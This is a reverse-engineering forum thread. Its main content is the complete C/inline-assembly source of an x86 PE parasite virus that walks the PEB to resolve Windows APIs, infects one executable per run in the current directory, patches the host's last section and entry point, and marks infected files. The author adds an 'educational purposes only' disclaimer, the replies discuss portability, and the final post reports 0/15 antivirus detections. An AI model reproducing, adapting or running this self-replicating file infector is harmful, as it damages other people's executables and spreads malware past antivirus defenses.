Jump to content
Tuts 4 You

X86 PE Parasite


JMC31337

Recommended Posts

//./gcc -masm=intel -mwindows -m32 -o file.exe xfile.c
//Run the virus under a debugger (the jmp orig EP only works
//after first infection is completed  - afterwards all files
//will infect and run as normal
//it will infect 1 exe file per run in current dir 
//x86 PE Parasite
//WARNING!
//For educational purposes and virology analysis ONLY!
//The author is not responsible for any damage caused
//by this code
//NOTE: I took some cheap tactics and tricks to get this
//to work and its some real convoluted coding
 
//============virt mem array=========
//virtallocAPI*   [ebp+0x00] (win7)
//findfirstfileAPI [ebp+0x04]
//findnextfileAPI  [ebp+0x08]
//CreateFileAPI    [ebp+0x0c]
//ReadFileAPI   [ebp+0x10]
//CloseHandleAPI   [ebp+0x14]
//WriteFileAPI   [ebp+0x18]
//fileEP        [ebp+0x1c] PE+0x28
//fileSecNos    [ebp+0x20] PE+0x06
//fileImgSize+4000h    [ebp+0x24] PE+0x50
//fileImgBase   [ebp+0x28]  PE+34
//fileSecVS+4000h    [ebp+0x2c]   PE+F8+((0x28*[secnos])-20h)
//fileSecRS+4000h    [ebp+0x30]   PE+F8+((0x28*[secnos])-18h)
//shellEP     [ebp+0x34]
//hostloadPTR [ebp+0x38]           
//GetProcAPI  [ebp+0x3c]
//LoadLib        [ebp+0x40]
//k32 base       [ebp+0x44]
//fhandle         [ebp+0x48]
//WIN32_FILE_DATA  [ebp+0x4C]
//WIN32 fname [ebp+WIN32_FILE_DATA+0x2c]
//GetFileSizeAPI [ebp+0x100]
//FileSize [ebp+0x104]
//virtHostAddr [ebp+0x108]
//=========================================
 
 
#include <windows.h>
 
void step()
{
asm
(
".intel_syntax noprefix\n"
 
 
//HEURISTICS AV DETECT THIS 
//BASE WALKING
//crypto mem it
 
"_start:\n"
"call _start2\n"
"_start2:\n"
"pop ebx\n"
"sub ebx,0x05\n"
"pushad\n"
"mov [0x7EFDF400],ebx\n" //CHEAP
 
 
//==================================
"mov eax,dword ptr fs:[0x30]\n"
"mov eax,dword ptr ds:[eax+0xC]\n"
"mov eax,dword ptr ds:[eax+0x14]\n"
"mov eax,dword ptr ds:[eax]\n"
"mov eax,dword ptr ds:[eax]\n"
"mov eax,dword ptr ds:[eax+0x10]\n"
//===================================
 
 
"mov ebx,eax\n"  //eax ebx = k32 base
"mov eax,[eax+0x3c]\n"  
"add eax,ebx\n"   //eax=PE
"cmp word ptr[eax+0x04],0x014C\n" //0x8664 for x64...0x14c for x86
"jne _end\n"
"sub eax,ebx\n"
"mov eax,[eax+0x78+ebx]\n"
"add eax,ebx\n"
"mov edx,eax\n"  //edx=imgVA
 
 
"mov ecx,[edx+0x18]\n"
"mov eax,[edx+0x20]\n"
"add eax,ebx\n"
 
 
"_find:\n"
"dec ecx\n"
"mov edi,[eax+ecx*0x04]\n"
"add edi,ebx\n"
"cmp dword ptr [edi],0x50746547\n"
"jnz   _find\n"
"cmp   dword ptr [edi + 0x04],0x41636f72\n" //Acor
"jnz   _find\n"
"cmp   dword ptr [edi + 0x08],0x65726464\n" //erdd
"jnz   _find\n"
"cmp   word  ptr [edi + 0x0C],0x7373\n" //ss
"jnz   _find\n"
 
"mov eax,[edx+0x24]\n"
"add eax,ebx\n"
"mov cx,[eax+ecx*0x02]\n"
"mov eax,[edx+0x1c]\n"
"add eax,ebx\n"
"mov eax,[eax+ecx*0x04]\n"
"add eax,ebx\n"
"mov edi,eax\n" //edi eax = GetProcAPI
 
 
 
"push 0x00\n"        //00000000  ....
"push 0x41797261\n"   //41797261  aryA
"push 0x7262694C\n"  //7262694C  Libr
"push 0x64616F4C\n"  //64616F4C  Load
"push esp\n"         //esp = loadlibraryA on stack
"push ebx\n"        //push the k32 base address
 
"call edi\n"
"add esp,0x10\n"  //clean stack garbage up
"mov edx,eax\n" //edx=LoadLibraryA API edi=GetProcAddr
 
"push edx\n"
 
//set virt mem location RWE
 
"push 0x00\n"
"push 0x636f6c6c\n"
"push 0x416c6175\n"
"push 0x74726956\n"
"push esp\n"
"push ebx\n"
"call edi\n" //eax=VirtualAllocAPI
"add esp,0x10\n"  //clean stack garbage up
 
 
"push 0x40\n"
"push 0x1000\n"
"push 0x1000\n"
"push 0\n"
"call eax\n" //eax=Virtrual RWE mem array 
 
"mov ebp,eax\n" //set the ebp pointer to virt mem
 
"mov ecx,edi\n"
"add ecx,0x600\n"  //win7 virt alloc is -600 getproc
"mov [ebp],ecx\n"
"mov [ebp+0x3c],edi\n"
"mov [ebp+0x44],ebx\n"
"pop edx\n"
"mov [ebp+0x40],edx\n"
//edi=getproc
 
 
//FindFirstFileA
//46 69 6E 64 46 69 72 73 74 46 69 6C 65 41 00
"push 0x004165\n"
"push 0x6c694674\n"
"push 0x73726946\n"
"push 0x646e6946\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x04],eax\n"
"add esp,0x10\n"
 
//FindNextFileA
//46 69 6E 64 4E 65 78 74 46 69 6C 65 41 00 
"push 0x0041\n"
"push 0x656c6946\n"
"push 0x7478654e\n"
"push 0x646e6946\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x08],eax\n"
"add esp,0x10\n"
 
 
//CreateFileA
//43 72 65 61 74 65 46 69 6C 65  41 00
"push 0x0041656c\n"
"push 0x69466574\n"
"push 0x61657243\n" 
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x0c],eax\n"
"add esp,0x0c\n"
 
 
//ReadFile
//52 65 61 64 46 69 6C 65 00
"push 0x00\n"
"push 0x656c6946\n"
"push 0x64616552\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x10],eax\n"
"add esp,0x0c\n"
 
 
//CloseHandle
//43 6C 6F 73 65 48 61 6E 64 6C 65 00 
"push 0x00656c64\n"
"push 0x6e614865\n"
"push 0x736f6c43\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x14],eax\n"
"add esp,0x0c\n"
 
 
//WriteFile
//57 72 69 74 65 46 69 6C 65 00
"push 0x0065\n"
"push 0x6c694665\n"
"push 0x74697257\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x18],eax\n"
"add esp,0x0c\n"
 
//GetFileSize
//47 65 74 46 69 6C 65 53 69 7A 65
"push 0x00657a69\n"
"push 0x53656c69\n"
"push 0x46746547\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov edx,ebp\n"
"add edx,0x100\n"
"mov [edx],eax\n"
"add esp,0x0c\n"
 
 
//setup WIN32_FIND_DATA
"mov edx,ebp\n"
"add edx,0x2c\n"
"add edx,0x4c\n"
"mov dword ptr[edx],0x78652e2a\n"
"mov dword ptr[edx+0x4],0x0065\n"
"mov edx,ebp\n"
"add edx,0x4c\n"
"push edx\n"
"mov edx,ebp\n"
"add edx,0x78\n"
"push edx\n"
"mov edx,[ebp+0x04]\n"
"call edx\n"                  //FindFirstFile
 
"cmp eax,0x00\n" //eax 0 = no file
"je _end\n"
 
 
"mov [ebp+0x48],eax\n"
 
//open file to see if it has RW privs
"push 0x00\n"
"push 0x80\n"
"push 0x03\n"
"push 0x00\n"
"push 0x00\n"
"push 0xC0000000\n" //read+write
"mov edx,ebp\n"
"add edx,0x78\n"
"push edx\n"
"mov edx,[ebp+0x0c]\n"
"call edx\n"    //CreateFile
 
 
"cmp eax,0x00\n"
"je _end\n"
"cmp eax,0xFFFFFFFF\n" //ff...=share error
"je _findnext\n"
 
"mov [ebp+0x250],eax\n"
 
 
 
"_findret:\n"
//GetFileSize
//eax=file handle
"push eax\n"
"mov edx,ebp\n"
"add edx,0x104\n"
"push edx\n"
"sub edx,0x04\n"
"push eax\n"
"mov edx,[edx]\n"
"call edx\n"
"mov [ebp+0x104],eax\n"
 
"mov edx,eax\n"
"add edx,0x4000\n" //inc fsize + 4000h
"push 0x40\n"    //PAGE_EXECUTE_READWRITE
"push 0x1000\n"  //MEM_COMMIT
"push edx\n"    //size
"push 0x00\n"   //virt addr
"mov edx,[ebp]\n"
"call edx\n"
"mov [ebp+0x108],eax\n"
 
 
//ReadFile
"mov edx,0x00\n"
"push edx\n"
"mov edx,ebp\n"
"add edx,0x10c\n" //ebp+10c hold the bytes read ret
"push edx\n"
"mov edx,ebp\n"
"add edx,0x104\n"
"mov edx,[edx]\n"
//"add edx,0x4000\n"
"push edx\n"
"mov edx,ebp\n"
"add edx,0x108\n"
"mov edx,[edx]\n"
"push edx\n"
"mov edx,[esp+0x10]\n"
"push edx\n"
"mov edx,[ebp+0x10]\n"
"call edx\n"    //ReadFile (ebp+0x108 = virt file)
"add esp,0x04\n"
 
 
//CloseHandle
"mov edx,[ebp+0x250]\n"
"push edx\n"
"mov edx,[ebp+0x14]\n"
"call edx\n"
 
//DETECT EOF "X" IF HOST IS INFECTED
//CLOSEHANDLE B4 findnext??  
 
"mov edx,[ebp+0x108]\n"
"add edx,[ebp+0x104]\n"
"dec edx\n"
"cmp byte ptr [edx],0x58\n"
"je _findnext\n"
 
"mov edx,[ebp+0x108]\n"
"add edx,[edx+0x3c]\n"
"cmp word ptr [edx+0x04],0x014c\n" //x86 parasite
"jne _findnext\n"
 
 
 
//***************************************8
//place host's EP into 0x7EFDF404 
// and host's PE+ 0xbc
//since we'll overwrite orig EP
//to point to shell
 
"push edx\n"
"mov ecx,edx\n"
"add ecx,0xbc\n"
//"mov ecx,[edx+0xbc]\n"  //host PE not used location
"mov eax,[edx+0x34]\n" //eax=hostBaseAddr
"add edx,0x28\n"
"mov edx,[edx]\n"
"add edx,eax\n"
"mov [ecx],edx\n"
"mov [0x7efdf404],edx\n"
"pop edx\n"
//****************************************8
 
 
"mov ecx,[edx+0x28]\n"
 
//here---------------------------------------------------
"mov ecx,[0x7EFDF404]\n"
"mov [edx+0xbc],ecx\n"
"mov [ebp+0x200],ecx\n"
//-------------------------------------------------------
 
"mov [ebp+0x1c],ecx\n"
"xor ecx,ecx\n"
"mov cx,word ptr[edx+0x06]\n"
"mov [ebp+0x20],ecx\n"
"mov ecx,[edx+0x50]\n"
"mov [ebp+0x24],ecx\n"
"mov ecx,[edx+0x34]\n"
"mov [ebp+0x28],ecx\n"
 
 
"mov ecx,edx\n"
"add ecx,0xf8\n"
"mov eax,[ebp+0x20]\n"
"mov edx,0x28\n"
"mul edx\n"
"add ecx,eax\n"
"sub ecx,0x20\n"
"mov edx,[ecx]\n"
"mov [ebp+0x2c],edx\n"
"add ecx,0x08\n"
"mov edx,[ecx]\n"
"mov [ebp+0x30],edx\n"
 
//edx=PE sec vs
"mov edx,[ebp+0x2c]\n"
"add edx,0x4000\n"
"mov [ebp+0x2c],edx\n"
"mov edx,[ebp+0x30]\n"
"add edx,0x4000\n"
"mov [ebp+0x30],edx\n"
"mov edx,[ebp+0x24]\n"
"add edx,0x4000\n"
"mov [ebp+0x24],edx\n"
 
 
"push 0x006c6c\n"
"push 0x642e3233\n"
"push 0x72657375\n"
"mov edx,[ebp+0x40]\n"
"push esp\n"
"call edx\n"
"add esp,0x0c\n"
 
 
"push 0x0041786f\n"
"push 0x42656761\n"
"push 0x7373654d\n"
"push esp\n"
"push eax\n"
"mov edx,[ebp+0x3c]\n"
"call edx\n"
"add esp,0x08\n"
 
"push 0x00\n"
"push 0x00\n"
"push 0x00\n"
"push 0x00\n"
"call eax\n"
"add esp,0x04\n"
 
 
//DETECT virus -> host
//DETECT infectedHOST -> host
 
 
"_peNFX:\n"
"mov edx,[ebp+0x108]\n"
"add edx,[ebp+0x104]\n"
"mov ecx,0x550\n"
"mov esi,[0x7EFDF400]\n"
//"add esi,[ebp+0x108]\n"
"mov edi,edx\n"
"rep movsb\n"
 
 
 
 
"mov ecx,[ebp+0x108]\n"
"add ecx,[ecx+0x3c]\n"
"add ecx,0xf8\n"
"mov eax,[ebp+0x20]\n"
"mov edx,0x28\n"
"mul edx\n"
"add ecx,eax\n"
"sub ecx,0x20\n"
"push ecx\n"
"mov edx,ebp\n"
"add edx,0x28\n"
"mov edx,[edx]\n"
"add edx,[ebp+0x1c]\n"
"mov ecx,[ebp+0x104]\n"
"add ecx,0x4000\n"
 
 
 
//==================================
//notes:
//*change hostEP
 
"mov edx,[esp]\n"
"mov eax,[edx+0x0c]\n" //eax=RO
"sub ecx,eax\n"
"mov eax,[edx+0x04]\n" //edx=VO
"add ecx,eax\n"
"mov [ebp+0x34],ecx\n"
"mov edx,ebp\n"
"add edx,0x108\n"
"mov edx,[edx]\n"
 
//change VS
"mov edx,[esp]\n"
"mov eax,[ebp+0x2c]\n"
"mov [edx],eax\n"
 
//change RS
"mov edx,[esp]\n"
"add edx,0x08\n"
"mov eax,[ebp+0x30]\n"
"mov [edx],eax\n"
 
//change imgsize
"mov edx,[esp]\n"
"mov edx,[ebp+0x108]\n"
"add edx,[edx+0x3c]\n"
"add edx,0x50\n"
"mov eax,[ebp+0x24]\n"
"mov [edx],eax\n"
 
//add "X" EOF indication
"mov edx,[ebp+0x108]\n"
"add edx,[ebp+0x104]\n"
"add edx,0x4000\n"
"dec edx\n"
"mov byte ptr[edx],0x58\n"
 
 
//reopen file for write
//when using valloc
//we cant access a file 
//for read then write one shot
//its one then the other
 
"push 0x00\n"
"push 0x80\n"
"push 0x03\n"
"push 0x00\n"
"push 0x00\n"
"push 0x40000000\n" //read+write
"mov edx,ebp\n"
"add edx,0x78\n"
"push edx\n"
"mov edx,[ebp+0x0c]\n"
"call edx\n"    //CreateFile
 
"cmp eax,0x00\n"
"je _end\n"
"cmp eax,0xFFFFFFFF\n" //ff...=share error
"je _findnext\n"
 
"mov [ebp+0x250],eax\n"
 
 
//shell_raw_location - ro + vo + imgbase
//change hostEP
 
"mov eax,[ebp+0x108]\n"
"add eax,[ebp+0x104]\n"
"add eax,0x502\n" //CHEAP
 
"mov edx,fs:[0x30]\n"
"mov edx,[edx+0x08]\n"
"push edx\n"
//"mov edx,[0x010075]\n" //CHEAP
"add edx,[edx+0x3c]\n"
"add edx,0x28\n"
"mov edx,[edx]\n"
"pop ecx\n"
"add edx,ecx\n"
//"mov [eax],edx\n"
"mov [0x7EFDF400],edx\n" 
 
 
"mov edx,[ebp+0x108]\n"
"add edx,[edx+0x3c]\n"
"add edx,0x28\n"
"mov ecx,[ebp+0x104]\n"
//"sub ecx,0x4000\n"
"mov edx,[esp]\n"
"sub ecx,[edx+0x0c]\n"
"add ecx,[edx+0x04]\n"
"mov edx,[ebp+0x108]\n"
"add edx,[edx+0x3c]\n"
"add edx,0x28\n"
"mov [edx],ecx\n"
 
 
 
/*
"mov ecx,[ebp+0x108]\n"
"add ecx,[ecx+0x3c]\n"
"mov edx,[0x7EFDF404]\n"
"add ecx,0xbc\n"
"mov [ecx],edx\n"
*/
 
 
//writefile
"push 0x00\n"
"mov edx,ebp\n"
"add edx,0x10c\n"
"mov dword ptr[edx],0x000000\n"
"push edx\n"
"mov edx,[ebp+0x104]\n"
"add edx,0x4000\n"
"push edx\n"
"mov edx,[ebp+0x108]\n"
"push edx\n"
"mov edx,[ebp+0x250]\n"
"push edx\n"
"mov edx,[ebp+0x18]\n"
"call edx\n"
 
"pop eax\n"
"jmp _end\n"
 
 
"_findnext:\n"
"mov edx,ebp\n"
"add edx,0x4c\n"
"push edx\n"
"mov edx,[ebp+0x48]\n"
"push edx\n"
"mov edx,[ebp+0x08]\n"
"call edx\n"
 
"cmp eax,0x00\n"
"je _end\n"
 
 
"push 0x00\n"
"push 0x80\n"
"push 0x03\n"
"push 0x00\n"
"push 0x00\n"
"push 0xc0000000\n" //read+write
"mov edx,ebp\n"
"add edx,0x78\n"
"push edx\n"
"mov edx,[ebp+0x0c]\n"
"call edx\n"   //CreateFileA
 
 
"cmp eax,0x00\n"
"je _end\n"
"cmp eax,0xFFFFFFFF\n" //ff...=share error
"je _findnext\n"
"mov [ebp+0x250],eax\n"
"jmp _findret\n"
 
 
 
//detect eax=0 and eax=ffffffff
 
"_end:\n"
"popad\n"
"mov edx,fs:[0x30]\n"
"mov edx,[edx+0x08]\n"
"mov ecx,edx\n"
"add ecx,[ecx+0x3c]\n"
"mov edx,[ecx+0xbc]\n"
"jmp edx\n"
"push eax\n"
"push eax\n"
);
 
 
 
 
}//end step fx
 
 
int WINAPI WinMain(HINSTANCE h, HINSTANCE h2, LPSTR lp, int i)
{
 
asm("pop ebp\n");
asm("call _start\n");
MessageBoxA(0,0,0,0);
}

 

Link to comment
Share on other sites

CodeExplorer

Look a bit like my private virus!
 

Quote

"mov [0x7EFDF400],ebx\n" //CHEAP

Quote

"mov [0x7EFDF400],edx\n"

What are those for?
Plus I doubt it will work on any OS different than yours!
 

Link to comment
Share on other sites

2 hours ago, CodeExplorer said:

Look a bit like my private virus!
 

What are those for?
Plus I doubt it will work on any OS different than yours!
 

That’s just a location in the PEB that can handle some stored dword data

tested on a win7, the virtualalloc method (add ecx,600) may not work on others but it can be fixed to do so

take care, on to Linux to write one similar

Link to comment
Share on other sites

  • 2 weeks later...
xfile.exe
Name:	xfile.exe 
Size: 	18.33kB (18,768 bytes) 
Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows 
First seen: 	May 5, 2019 at 11:03:22 PM GMT+2
MD5:	3b722544eb9410e2f7bf42350ff530c0 
SHA1:	1e1edf4df43fafe5a3cfa18646a573142545ad6e 
Status:	Scan finished. 0/15 scanners reported malware.
Scan taken on:	May 5, 2019 at 11:03:23 PM GMT+2
Avast! Antivirus  May 5, 2019 Found nothing   BitDefender Antivirus  May 5, 2019 Found nothing   ClamAV  May 5, 2019 Found nothing Dr. Web  May 5, 2019 Found nothing   MicroWorld eScan  May 5, 2019 Found nothing   ESET  May 5, 2019 Found nothing Fortinet  May 4, 2019 Found nothing   F-PROT Antivirus  May 5, 2019 Found nothing   F-Secure Anti-Virus  May 5, 2019 Found nothing G DATA  May 5, 2019 Found nothing   Ikarus  May 5, 2019 Found nothing   K7 AV  May 5, 2019 Found nothing Sophos  May 5, 2019 Found nothing   Trend Micro Antivirus  May 4, 2019 Found nothing   VBA32  May 4, 2019 Found nothing

--Jotti Scanned -- Norton Internet Security Heuristics were raised, AFTER the infection already transpired into 1 file, this 1 file was not able to infefct some other file 

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...